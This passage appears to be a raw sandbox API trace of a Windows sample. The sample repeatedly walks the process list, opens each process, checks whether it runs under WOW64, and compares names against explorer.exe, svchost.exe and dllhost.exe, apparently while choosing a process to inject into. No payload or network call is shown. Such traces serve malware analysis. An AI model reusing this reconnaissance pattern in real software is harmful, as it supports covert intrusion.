OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0196.340] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.340] CloseHandle (hObject=0xd8) returned 1 [0196.340] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.340] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0196.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0196.341] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.341] CloseHandle (hObject=0xd8) returned 1 [0196.341] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0196.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0196.341] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0196.342] CloseHandle (hObject=0xd4) returned 1 [0196.342] Sleep (dwMilliseconds=0x3e8) [0197.381] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0197.383] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0197.384] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0197.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0197.384] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0197.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0197.385] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0197.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0197.385] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0197.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0197.386] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0197.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0197.386] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0197.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0197.387] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0197.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0197.387] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0197.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0197.388] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0197.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0197.388] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0197.389] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0197.389] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0197.390] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0197.390] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0197.391] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0197.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0197.391] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0197.392] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0197.392] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0197.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0197.393] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.393] CloseHandle (hObject=0xd8) returned 1 [0197.393] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0197.393] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0197.393] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0197.393] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0197.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0197.394] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0197.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0197.394] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.394] CloseHandle (hObject=0xd8) returned 1 [0197.394] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0197.394] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0197.394] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0197.394] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0197.395] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0197.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0197.395] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0197.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0197.396] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.396] CloseHandle (hObject=0xd8) returned 1 [0197.396] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0197.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0197.397] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.397] CloseHandle (hObject=0xd8) returned 1 [0197.397] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0197.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0197.397] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.397] CloseHandle (hObject=0xd8) returned 1 [0197.397] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0197.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0197.398] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.398] CloseHandle (hObject=0xd8) returned 1 [0197.398] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0197.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0197.398] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.398] CloseHandle (hObject=0xd8) returned 1 [0197.398] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0197.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0197.399] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.399] CloseHandle (hObject=0xd8) returned 1 [0197.399] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0197.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0197.400] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.400] CloseHandle (hObject=0xd8) returned 1 [0197.400] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0197.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0197.400] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.400] CloseHandle (hObject=0xd8) returned 1 [0197.400] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0197.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0197.401] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.401] CloseHandle (hObject=0xd8) returned 1 [0197.401] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0197.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0197.401] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.401] CloseHandle (hObject=0xd8) returned 1 [0197.401] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0197.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0197.402] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.402] CloseHandle (hObject=0xd8) returned 1 [0197.402] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0197.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0197.403] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.403] CloseHandle (hObject=0xd8) returned 1 [0197.403] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0197.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0197.403] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.403] CloseHandle (hObject=0xd8) returned 1 [0197.403] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0197.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0197.404] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.404] CloseHandle (hObject=0xd8) returned 1 [0197.404] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0197.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0197.404] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.404] CloseHandle (hObject=0xd8) returned 1 [0197.404] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0197.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0197.405] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.405] CloseHandle (hObject=0xd8) returned 1 [0197.405] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0197.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0197.406] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.406] CloseHandle (hObject=0xd8) returned 1 [0197.406] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0197.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0197.406] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.406] CloseHandle (hObject=0xd8) returned 1 [0197.406] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0197.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0197.407] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.407] CloseHandle (hObject=0xd8) returned 1 [0197.407] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0197.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0197.407] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.407] CloseHandle (hObject=0xd8) returned 1 [0197.407] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0197.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0197.408] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.408] CloseHandle (hObject=0xd8) returned 1 [0197.408] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0197.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0197.409] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0197.409] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0197.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0197.410] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0197.410] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0197.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0197.411] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, 